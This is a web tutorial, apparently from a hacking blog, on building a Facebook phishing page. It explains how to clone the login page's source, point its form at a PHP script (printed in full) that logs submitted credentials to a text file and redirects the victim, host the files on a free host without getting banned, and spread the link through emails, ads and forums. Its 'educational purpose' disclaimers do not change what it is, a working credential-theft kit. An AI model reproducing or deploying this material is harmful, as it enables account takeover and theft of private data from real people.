Create A Phishing Site

In this tutorial, I am going to share how to setup a phishing page to harvest usernames and passwords that can be used to hack other users Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.

Note :

• Only For Educational Purpose
• I Won't Be Responsible If You Miss Using It 

Site To Host Website :

• Use This To Host Your Site 

Tips For Android Users :

1. Use Chrome Browser 
2. To View Source Code In Chrome Type view-source:websitelink.com
3. Replace Website link.com With The Site Link You Want To Clone 
4. Be Careful Or You Will Get Ban At 000webhost

• Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
• Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
• If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
• You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
• Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
• Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
• Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

At this point, you should now have two files saved: index.htm and post.php.

Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost.

After you have signed up for an account, browse to the control panel, and then to file manager.

Once the window opens, go to publick_html.

Delete default.php, and then upload index.htm and post.php.

Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.

The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.

Now go back to the file manager and public_html. There should be a file labeled username.txt.

Open this file and you should be able to see login credentials that have been entered by a test user.

Site To Host Website :

• Use This To Host Your Site 

Tips For Android Users :

1. Use Chrome Browser 
2. To View Source Code In Chrome Type view-source:websitelink.com
3. Replace Website link.com With The Site Link You Want To Clone 
4. Be Careful Or You Will Get Ban At 000webhost